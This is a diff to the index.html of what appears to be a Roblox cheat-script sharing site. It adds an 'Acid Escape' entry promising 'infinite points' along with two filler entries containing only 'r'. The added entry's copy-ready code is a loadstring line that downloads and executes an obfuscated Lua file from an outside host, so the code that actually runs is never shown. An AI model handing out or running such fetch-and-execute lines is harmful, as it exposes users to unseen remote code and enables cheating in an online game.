--- a/index.html
+++ b/index.html
@@ -398,14 +398,40 @@
 
 
 <div class="script-item new-style">
-    <div class="script-header">m</div>
-    <div class="subheader">m</div>
-    <div class="script-code">print("m")
+    <div class="script-header">⚠️Acid Escape</div>
+    <div class="subheader">Just infinite points.</div>
+    <div class="script-code">loadstring(game:HttpGet("https://getorbs.us.to/AE-obfuscated.lua"))()
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
         <!-- Optional: Add a button to join the game -->
-        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/18169009346/doctors-office')">Game link</button>
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/16841760655/Acid-Escape')">Game link</button>
+    </div>
+</div>
+
+
+<div class="script-item new-style">
+    <div class="script-header">r</div>
+    <div class="subheader">r</div>
+    <div class="script-code">r
+    </div>
+    <div class="button-container">
+        <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
+        <!-- Optional: Add a button to join the game -->
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/16841760655/Acid-Escape')">Game link</button>
+    </div>
+</div>
+
+
+<div class="script-item new-style">
+    <div class="script-header">r</div>
+    <div class="subheader">r</div>
+    <div class="script-code">r
+    </div>
+    <div class="button-container">
+        <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
+        <!-- Optional: Add a button to join the game -->
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/16841760655/Acid-Escape')">Game link</button>
     </div>
 </div>
 
